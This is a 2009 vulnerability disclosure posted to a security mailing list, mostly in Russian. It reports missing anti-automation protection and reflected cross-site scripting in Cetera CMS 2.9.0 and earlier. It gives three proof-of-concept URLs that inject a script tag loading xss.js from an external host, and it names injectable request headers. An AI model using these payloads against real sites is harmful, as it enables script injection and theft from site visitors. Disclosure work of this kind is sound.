Related information

Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

[ISecAuditors Security Advisories] QuiXplorer <=2.4.1beta Remote Code Execution vulnerability

[ISecAuditors Security Advisories] Horde 3.3.5 "PHP_SELF" Cross-Site Scripting vulnerability

SEC Consult SA-20091217-0 :: Authentication bypass and file manipulation in Sitecore Staging Module

From:	MustLive <mustlive_(at)_websecurity.com.ua>
Date:	17.12.2009
Subject:	Vulnerabilities in Cetera CMS

Здравствуйте 3APA3A!

Сообщаю вам о найденных мною Insufficient Anti-automation и Cross-Site Scripting уязвимостях в Cetera CMS.

Insufficient Anti-automation:

http://site/support/default.php?project=1

Отсутствует защита от автоматизированных запросов (капча).

XSS:

http://site/support/default.php?project=%22%3E%3Cscript%20src=http://websecurity.com.ua/webto
ols/xss.js%20%3E

http://site/support/default.
php?project=1&lang=%22%3E%3Cscript%20src=http://websecurity.c
om.ua/webtools/xss.js%20%3E

http://site/support/default.
php?project=1&name=%22%3E%3Cscript%20src=http://websecurity.c
om.ua/webtools/xss.js%20%3E

И через заголовки User-Agent, Accept-Language и Referer:

Уязвимы Cetera CMS v2.9.0 и предыдущие версии.

Дополнительная информация о данных уязвимостях у меня на сайте:
http://websecurity.com.ua/3637/

Best wishes & regards,
MustLive
Администратор сайта
http://websecurity.com.ua